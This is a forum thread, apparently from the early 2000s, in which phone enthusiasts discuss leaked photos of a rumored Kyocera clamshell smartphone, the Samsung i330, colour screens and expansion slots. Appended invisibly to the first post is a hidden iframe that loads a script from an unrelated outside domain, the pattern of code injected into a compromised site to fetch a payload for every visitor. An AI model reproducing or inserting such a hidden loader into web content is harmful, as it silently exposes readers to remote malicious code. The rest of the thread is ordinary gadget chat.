+ Reply to Thread
Page 1 of 2 1 2 LastLast

Rumor/photos of new Kyocera smartphone...

Apologies if this has been posted already, but I was able find photos of the new rumored Kyocera smartphone. Don't know if they're real or not (or how long they'll be online ... Kyocera apparently asked PalmInfoCenter to remove their pictures) but it looks like an interesting phone.

http://www.bargainpda.com/default.asp?newsID=740

It's the lower photo (not the upper one) and it took forever to load on my 56k modem, so give it a minute if you're not on broadband.

-Doug<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Napoleon Bonaparte Jr.

Talking I like it ..

I like it ...

And the price is only 500$ .

I hope , Samsung will come's out with good model ,

not 330 .

Well....

I dont know if its just me...but i think that Phone is so HOT....to tell you the truth i Love the clam design (starting from the Smasung 8500)...and i think that is great to implement into a smartphone...the only thing i worry about ishow Top-heavy it is. But in all hoestly i would buy that over anything we have seen so far in terms of Samsung, esecially that there might be a SD expansion slot....can you imagine the possibilities;
    Blue-tooth enabled printing, Blue-tooth chat
    Memory up to 256 MBs
    Too many thing to list...

P.S. i am hoping for a high-quality color screen, one of the things that is annoying about our phone...(hopefully no ring-around-the-screen... )
    Steve a.k.a. Superman a.k.a. Kal-El

Re: Well....

Originally posted by mrkalel
    P.S. i am hoping for a high-quality color screen, one of the things that is annoying about our phone...(hopefully no ring-around-the-screen... )
    You said it! I will not buy another phone unless it has a very decent color screen - active matrix, good saturation, and reasonable visibility outdoors. I hope all the manufacturers are reading this forum ... I know it's tricky to get decent battery life when the quality of the screen improves, but this LCD on the I300 is really scraping the bottom of the barrel as far as color Palm screens go. Even the Palm IIIc's screen is better than ours!

Is it just me or does the screen on the new Kyocera look extremely small? It looks just like a regular LCD screen on a flip phone. That's small.

TONY
    http://i300-fanatic.cjb.net

Doug:
    Thanks for the picture. I had a 6035 before my i300. I like(d) both phones. Still have the 6035 as a back up, although I have not had the need to use it. I really like the design of this phone. Should be interesting when/if it arrives.

I have promised myself I would not buy a new phone this year... but, I have lied to myself before. If you have any more info, please keep us posted.
    Carl

Administrator
    Originally posted by CarlGalgano
    I have promised myself I would not buy a new phone this year...
    buwhwhwhhahahahaaaa............. yeah right Carl...

you know how you and i are... the first on the block with technology... before you know it, the i300 will be in the ol' technology drawer along with the newton et al....

Marc:
    Yeah, but its gonna be hard to explain to the boss why I need another cell phone.
    From what I have seen, I will likely pass on the i330, but I really do like the design on the supposed Kyo replacement. The color screen did look crappy in the pictures though. I like the clamshell design and it looks like that phone may be a little smaller too. Marc, what are you going to do if both the Kyo and the i330 come out at the same time?
    Carl

To Greatness, I Aspire

Nice.............

I am very happy with my i300 but the new Kyocera looks very compelling. Honestly, I think a flip design will win out over time. The TREO looks like the ultimate device but it is just a little early in the birth process (poor battery life, no CDMA, etc.)

Why flip? Two of the biggest reasons are: 1) Protect the screen. 2) shorten the length of the phone.

Please refer to Star Trek communicators of the 60's to see the future

Administrator

Arrow

Please refer to Star Trek communicators of the 60's to see the future
    exactly!

carl, i to love the new design of the 6035, but without more "official" info on the phone, such as if it will have the SD slot, memory, OS and stuff like that, i cant say.. the i330 is definately going to be bought when it gets here, unless the kyo geeks can release this baby sooner rather than later...

, whats wrong with us carl?? cant we just leave well enough alone??

Its like a disease Marc. SO will you buy which ever is release first? If that is the design of the new Kyo, I think I am waiting. I am NOT going to buy 2 new cells this year, that is for sure. Damn, I wish technology would slow down a bit.
    Carl

Administrator

Arrow

Originally posted by CarlGalgano
    SO will you buy which ever is release first? If that is the design of the new Kyo, I think I am waiting.
    im sure the 330 will be released first since we have seen more PR about it and samsung has it on their press site. but if both phones were equal, that would be a tough , tough decision... i hope i dont have to make one...

I am NOT going to buy 2 new cells this year, that is for sure. Damn, I wish technology would slow down a bit. [/B]
    :p , just keep tellin' ya'self that Carl....

Du!

Question What do you think of no thumbboard?

Interesting that Kyocera opted for a graffiti input area rather than follow the recent trend of using a thumbboard. I've played with the Treo 180 and the Sony NR70V and found the thumbboard to be a welcome alternative to graffiti -- Improves one-handed operation. That would be my only gripe about what I've seen so far on the Kyocera T3.

Also interesting to note, Kyocera has decided to emphasize the phone aspect of their communicator over the PDA aspect. This also goes against the grain when you consider the Thera and other emerging communicators. How're you going to set the T3 into a Think Outside keyboard (oh, I know the answer -- using a funky attachment like the one for the 6035, right?).

The SD expansion slot would be a first and could go a long way in making up for the other design issues.
    ~ Du!
    Deep thought #111: Is the anticipation of a new gadget better than the gadget itself???

Guys,
    I do not have this phone yet and I can give you too many specifics, but I do know that this is a picture of the new Kyocera PDA/phone. That's about all the information that I can remember off the top of my head. I will ask around and see what other information I can find and be sure to keep everyone posted.

homer

Du!

Expansion

Originally posted by Homer
    Guys,
    I do not have this phone yet and I can give you too many specifics, but I do know that this is a picture of the new Kyocera PDA/phone. That's about all the information that I can remember off the top of my head. I will ask around and see what other information I can find and be sure to keep everyone posted.

homer
    Can you at least confirm that the phone has a SD expansion slot???
    ~ Du!
    Deep thought #111: Is the anticipation of a new gadget better than the gadget itself???

Bad news. As of today, the i330 is not going to have any kind of expansion slot. This is pre-release information and anything can happen between now and launch. But I have been told by my Sprint PCS source that the i330 is not going to have an expansion slot.

homer

Du!
    Originally posted by Homer
    Bad news. As of today, the i330 is not going to have any kind of expansion slot. This is pre-release information and anything can happen between now and launch. But I have been told by my Sprint PCS source that the i330 is not going to have an expansion slot.

homer
    My question was in reference to the new Kyocera Smartphone -- do you know if the production version of the phone has an SD expansion slot?
    ~ Du!

I've played with the Treo 180 and the Sony NR70V and found the thumbboard to be a welcome alternative to graffiti ....
    I played with the Sony a few days ago. Am I mistaken in thinking while it does have a thumboard, it also has a graffiti area? I was really impressed with the Sony.

I know even less about the Kyocera version than I know about the i330. Sorry. I will check around and keep everyone updated.

homer

smartphonecentral.com

Sony NR70

Hey MJ, my work just got me an NR70. Needless to say, it's an awesome PDA in a remarkable form factor. Screen is magnificant and the "feel" is better than any handheld I've ever used.

It has a major, glaring problem in that there's no wireless connectivity for it. There's a Bluetooth memory stick module in Japan, as well as a Compact Flash sleeve, but from what I hear the CF sleeve won't accept 802.11 cards.

--Jesse
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::